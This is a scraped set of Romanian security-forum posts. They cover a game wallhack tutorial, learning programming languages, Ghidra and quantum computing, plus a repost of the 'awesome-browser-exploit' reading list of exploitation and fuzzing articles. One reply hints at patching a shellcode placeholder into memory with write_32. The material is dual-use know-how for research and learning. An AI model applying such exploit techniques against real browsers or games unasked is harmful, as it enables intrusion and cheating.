examples of what we can do. In the following posts we will continue discovering all the different kind of things we can achieve and the best way to approach them. Sursa: https://niemand.com.ar/2019/01/13/creating-your-own-wallhack/

Posteaza aici cand ai nevoie de ajutor.

Probably you need to update it (replace 0xcccccccc with your shellcode - first 4 bytes, and continue). Not sure. write_32(codeAddr,0xcccccccc);

C++ sau Java. Si o sa ai bazele necesare pentru multe alte limbaje. PS: In Romania, dupa parerea mea, momentan se cauta mult pe Java.

Eu sper sa fie open-source. La urma urmei, nu e cine stie ce 0day si daca nu au nimic de ascuns, il fac open-source. Eh, si asa se pot ascunde lucruri.

Aici e un probabil screenshot (vechi): https://twitter.com/megabeets_/status/1083119509756674053

Din moment ce IBM a platit ceva verzisori pentru RedHat, cel mai probabil (daca este aplicabil calculatoarelor cuantice) vor folosi, sau adapta, Linux.

Vor trece de metodele "traditionale" de encriptie, insa cred ca vor mai trece ani buni pana atunci (cel putin pana va ajunge public). Insa pana atunci probabil vom avea si standarde de post-quantum cryptography. Oare o sa mearga bine jocurile pe calculatoarele astea?

Multe lucruri interesante.

Ceva de genul? https://w.wol.ph/2015/08/28/maximum-wifi-transmission-power-country/ Incearca un search aici: https://www.etsi.org/

Copy/Paste de la IDA: " IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all. "

Doar cei care lucreaza/au lucrat la NSA s-au jucat cu acel tool. Din martie, ne vom juca cu totii. Sper, ca pe langa "fully featured tool", sa arate si bine. Si obligatoriu: Dark Theme! Edit: Arata cam asa: https://wikileaks.org/ciav7p1/cms/page_9536070.html

Da, pare interesant. Pacat ca e facut in Java, insa e util ca e cross-platform. Din cate am vazut pe Twitter, o sa aiba UNDO! Iar cineva care a lucrat la NSA (Charlie Miller) zicea ca tool-ul are cel putin 13 ani, deci sper sa fie ceva de calitate.

Da, insa flexibilitatea si mai ales viteza de executie a limbajelor low level va fi intotdeauna la baza alegerilor facute pentru multe proiecte, ca browserele. Insa exista tendinta de a incerca lucruri noi, cun ar fi Rust (la Mozilla). Parca.

Nu doar asta, mai multe detalii despre implementare si cum se poate exploata.

awesome-browser-exploit Share some useful archives about browser exploitation. I'm just starting to collect what I can found, and I'm only a starter in this area as well. Contributions are welcome. Chrome v8 Basic v8 github mirror(docs within)[github] on-stack replacement in v8[article] // multiple articles can be found within A tour of V8: Garbage Collection[article] A tour of V8: object representation[article] v8 fast properties[article] learning v8[github] Writeup and Exploit Tech Mobile Pwn2Own Autumn 2013 - Chrome on Android - Exploit Writeup[article] Exploiting a V8 OOB write[article] IE Basic Microsoft Edge MemGC Internals[slides] The ECMA and the Chakra[slides] Writeup and Exploit Tech 2012 - Memory Corruption Exploitation In Internet Explorer[slides] 2013 - IE 0day Analysis And Exploit[slides] 2014 - Write Once, Pwn Anywhere[slides] 2014 - The Art of Leaks: The Return of Heap Feng Shui[slides] 2014 - IE 11 0day & Windows 8.1 Exploit[slides] 2014 - IE11 Sandbox Escapes Presentation[slides] 2015 - Spartan 0day & Exploit[slides] 2015 - 浏览器漏洞攻防对抗的艺术 Art of browser Vulnerability attack and defense (Chinese)[slides] 2016 - Look Mom, I don't use Shellcode[slides] 2016 - Windows 10 x64 edge 0day and exploit[slides] 2017 - 1-Day Browser & Kernel Exploitation[slides] 2017 - The Secret of ChakraCore: 10 Ways to Go Beyond the Edge[slides] 2017 - From Out of Memory to Remote Code Executio[slides] 2018 - Edge Inline Segment Use After Free (Chinese) Mitigation 2017 - CROSS THE WALL-BYPASS ALL MODERN MITIGATIONS OF MICROSOFT EDGE[slides] Browser security mitigations against memory corruption vulnerabilities[references] Browsers and app specific security mitigation (Russian) part 1[article] Browsers and app specific security mitigation (Russian) part 2[article] Browsers and app specific security mitigation (Russian) part 3[article] Webkit Basic JSC loves ES6[article] // multiple articles can be found within JavaScriptCore, the WebKit JS implementation[article] saelo's Pwn2Own 2018 Safari + macOS[exploit] Writeup and Exploit Tech Attacking WebKit Applications by exploiting memory corruption bugs[slides] Firefox Writeup and Exploit Tech CVE-2018-5129: Out-of-bounds write with malformed IPC messages[article] Misc Browser Basic Sea of Nodes[articles] // multiple articles can be found within Fuzzing The Power-Of Pair[slides] Browser Fuzzing[slides] Taking Browsers Fuzzing To The Next (DOM) Level[slides] DOM fuzzer - domato[github] browser fuzzing framework - morph[github] browser fuzzing and crash management framework - grinder[github] Browser Fuzzing with a Twist[slides] Browser fuzzing - peach[wiki] 从零开始学Fuzzing系列：浏览器挖掘框架Morph诞生记 Learn Fuzzing from Very Start: the Birth of Browser Vulnerability Detection Framework Morph(Chinese)[article] BROWSER FUZZING IN 2014:David vs Goliath[slides] A Review of Fuzzing Tools and Methods[article] Writeup and Exploit Tech it-sec catalog browser exploitation chapter[articles] 2014 - Smashing The Browser: From Vulnerability Discovery To Exploit[slides] smash the browser[github] Collections uxss-db js-vuln-db Thanks 0x9a82 swing Metnew Sursa: https://github.com/Escapingbug/awesome-browser-exploit/blob/master/README.md